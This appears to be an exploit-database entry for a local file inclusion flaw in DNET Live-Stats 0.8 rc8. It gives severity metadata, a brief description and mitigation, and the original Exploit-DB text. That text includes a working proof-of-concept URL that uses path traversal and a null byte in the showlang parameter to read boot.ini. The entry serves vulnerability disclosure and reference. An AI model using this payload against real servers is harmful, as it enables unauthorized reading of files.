header-logo
Suggest Exploit
vendor:
DNET Live-Stats
by:
Blake
7,5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: DNET Live-Stats
Affected Version From: 0.8 rc8
Affected Version To: 0.8 rc8
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

DNET Live-Stats 0.8 Local File Inclusion

The showlang parameter of DNET Live-Stats 0.8 does not properly sanitize user input, allowing an attacker to read arbitrary files on the server.

Mitigation:

Input validation should be used to prevent the inclusion of arbitrary files.
Source

Exploit-DB raw data:

# Exploit Title: DNET Live-Stats 0.8 Local File Inclusion
# Date: 10-04-10
# Author: Blake
# Software Link: http://sourceforge.net/projects/dnetlivestats/files/0.8/dnet-live-stats-0.8-rc8.zip/download
# Version: 0.8 rc8
# Tested on: Windows XP SP3 running xampp lite

The showlang parameter does not properly sanitize user input.

POC:
http://127.0.0.1/dnet/team.rc5-72.php?showlang=../../../../../../../../../../../../boot.ini%00

Navigation

Suggest Exploit

Services By CQR